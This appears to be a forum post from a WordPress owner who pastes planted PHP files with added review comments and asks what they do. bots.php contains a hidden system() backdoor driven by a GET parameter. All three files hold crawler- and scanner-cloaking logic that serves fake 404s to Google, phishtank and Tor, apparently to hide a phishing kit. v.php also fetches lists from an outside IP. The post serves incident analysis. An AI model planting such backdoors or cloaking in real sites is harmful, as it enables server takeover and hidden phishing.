Here are some files that hackers modified.
Inside my WordPress installation, I found an unknown folder called ID3 inside of a folder called ID3.
It contains three files.
1. bots.php
This is the code of bots.php:
GNU nano 2.3.1
File: bots.php
<? // Identify and block fake/bad bots
// NOTE(review): the comment above understates what this file does. Besides the
// visitor filtering further down, the `if` below is a command-execution backdoor.
// Reverse-DNS lookup of the visitor's IP; the result is matched against $blocked_words.
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
// BACKDOOR: when the request carries a `useragent` query parameter, a decoy heading
// is echoed and a value read from $_GET is passed to system(), i.e. executed as an
// OS command with the web server's privileges. No authentication check is visible.
// The listing is cut at the editor's right margin (trailing `$`), so the parameter
// name and the rest of the line are not shown — presumably `useragent`; confirm
// against the file on disk. Requests containing `useragent=` in the access logs
// show when and from where this was used.
if(isset($_GET['useragent'])){echo"<h1>deny_agent(bot)=('Yandex,Baiduspider,Acunetix,crossdomain,wwwroot,Exabot,NimbleCrawler,Octopus,OutfoxBot,ProPowerBot</h1><pre>"; system($_GET['us$
// Hostname filter: if the visitor's reverse-DNS name contains any of these
// substrings (the list includes "google", "amazonaws", "phishtank" and "tor-exit"),
// the script answers with a fake 404 and stops. Presumably this keeps crawlers
// and security scanners from seeing the content served to ordinary visitors.
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
foreach($blocked_words as $word) {
if (substr_count($hostname, $word) > 0) {
header("HTTP/1.0 404 Not Found");
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
// IP filter: $bannedIP holds address prefixes written as regex fragments. The
// visitor's IP is first compared as an exact string against the list, then each
// entry is used as a pattern in preg_match(); a match returns the same fake 404.
// The array line is cut at the editor's right margin (trailing `$`), so the
// full list is not shown here.
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*$
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
header('HTTP/1.0 404 Not Found');
exit();
} else {
foreach($bannedIP as $ip) {
if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
header('HTTP/1.0 404 Not Found');
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
}
?>
this is index.php
<?php
// Builds a per-request directory name: a random number (0-100000) joined to the
// visitor's IP, hashed with md5 and cut to the first 5 hex characters.
$random = rand(0,100000).$_SERVER['REMOTE_ADDR'];
$dst = substr(md5($random), 0, 5);
/**
 * Recursively copies the directory $src into a newly created directory $dst.
 *
 * @param string $src directory to read from
 * @param string $dst directory to create; if mkdir() fails nothing is copied
 * @return bool true when every entry was copied, false if opendir(), mkdir()
 *              or any copy failed
 */
function recurse_copy($src, $dst) {
$dir = opendir($src);
$result = ($dir === false ? false : true);
if ($result !== false) {
// mkdir() warnings are suppressed with @; only the boolean result is used.
$result = @mkdir($dst);
if ($result === true) {
while(false !== ( $file = readdir($dir)) ) {
// After the first failure $result is false and the remaining entries are skipped.
if (( $file != '.' ) && ( $file != '..' ) && $result) {
if ( is_dir($src . '/' . $file) ) {
$result = recurse_copy($src . '/' . $file,$dst . '/' . $file);
} else {
$result = copy($src . '/' . $file,$dst . '/' . $file);
}
}
}
closedir($dir);
}
}
return $result;
}
// Copies the `fbs` directory (its contents are not shown on this page) into the
// freshly named directory and redirects the visitor there, so every request to
// this file leaves a new 5-character directory on disk.
// NOTE(review): this presumably explains the randomly named entries the poster
// found; inspect `fbs` to see what is actually being served to visitors.
$src="fbs";
recurse_copy( $src, $dst );
header("location:".$dst."");
exit;
?>
this is v.php
<?php
// IP filter, same logic as in bots.php: exact-string comparison first, then each
// entry is used as a regex against the visitor's IP; a match gets a fake 404.
// The array line is cut at the editor's right margin (trailing `$`), so the
// full list is not shown here.
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*"$
if (in_array($_SERVER['REMOTE_ADDR'], $bannedIP)) {
header('HTTP/1.0 404 Not Found');
exit();
} else {
foreach($bannedIP as $ip) {
if (preg_match('/' . $ip . '/', $_SERVER['REMOTE_ADDR'])) {
header('HTTP/1.0 404 Not Found');
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
}
// Hostname filter: reverse-DNS lookup of the visitor's IP, then a fake 404 if the
// name contains any listed substring (e.g. "google", "amazonaws", "phishtank",
// "tor-exit"). Presumably meant to hide the content from crawlers and scanners.
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
foreach($blocked_words as $word) {
if (substr_count($hostname, $word) > 0) {
header("HTTP/1.0 404 Not Found");
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
// Hit counter: reads antibots.txt, increments the value on its first line and
// writes it back on every request that passed the filters above.
$count_hits = ("antibots.txt");
$hits = file($count_hits);
$hits[0]++;
$fp = fopen($count_hits, "w");
fputs($fp, "$hits[0]");
fclose($fp);
// Once the counter is above 30, each visitor is recorded in two generated files.
if ($hits[0] > 30) {
$a = getenv("REMOTE_ADDR");
$b = getenv("HTTP_USER_AGENT");
$c = getenv("HOSTNAME");
// Appends "Deny from <visitor IP>" to newips.php.
$ne = "Deny from $a";
$file = "newips.php";
$fp = fopen($file, "a");
fwrite($fp, $ne);
// Appends a rewrite rule containing the visitor's User-Agent to newuseragents.php.
// NOTE(review): the User-Agent header is client-controlled and is written
// unescaped into a file with a .php extension, so these generated files are
// untrusted content too and belong in the clean-up with the rest of the directory.
$n = "RewriteEngine on
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
RewriteRule ^.* - [F,L]
";
$file = "newuseragents.php";
$fp = fopen($file, "a");
fwrite($fp, $n);
$a = getenv("REMOTE_ADDR");
$b = getenv("HTTP_USER_AGENT");
$c = getenv("HOSTNAME");
// NOTE(review): the next line is the nano editor's title bar, not PHP. The lines
// that follow it repeat the ones above, presumably because a second screenful
// was pasted with overlap rather than because the file contains them twice.
GNU nano 2.3.1 File: v.php
$fp = fopen($count_hits, "w");
fputs($fp, "$hits[0]");
fclose($fp);
if ($hits[0] > 30) {
$a = getenv("REMOTE_ADDR");
$b = getenv("HTTP_USER_AGENT");
$c = getenv("HOSTNAME");
$ne = "Deny from $a";
$file = "newips.php";
$fp = fopen($file, "a");
fwrite($fp, $ne);
$n = "RewriteEngine on
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
RewriteRule ^.* - [F,L]
";
$file = "newuseragents.php";
$fp = fopen($file, "a");
fwrite($fp, $n);
$a = getenv("REMOTE_ADDR");
$b = getenv("HTTP_USER_AGENT");
$c = getenv("HOSTNAME");
// Downloads three lists over plain HTTP from 5.175.160.126 and strips HTML tags.
// The results overwrite $a, $b and $c and are not used again in the lines shown.
// NOTE(review): outbound requests from the web server to this address are an
// indicator worth searching for in proxy, firewall or egress logs.
$data1 = file_get_contents('http://5.175.160.126/blockedbots.php');
$a = strip_tags($data1);
$data2 = file_get_contents('http://5.175.160.126/blockedagents.php');
$b = strip_tags($data2);
$data3 = file_get_contents('http://5.175.160.126/blockedhosts.php');
$c = strip_tags($data3);
}
// The hostname filter from earlier in this file, run a second time: reverse-DNS
// lookup, then a fake 404 if the name contains any of the listed substrings.
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
foreach($blocked_words as $word) {
if (substr_count($hostname, $word) > 0) {
header("HTTP/1.0 404 Not Found");
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
?>
And I found some random numbers (check screenshots)
What are these files, and what do they do? How can I stop this?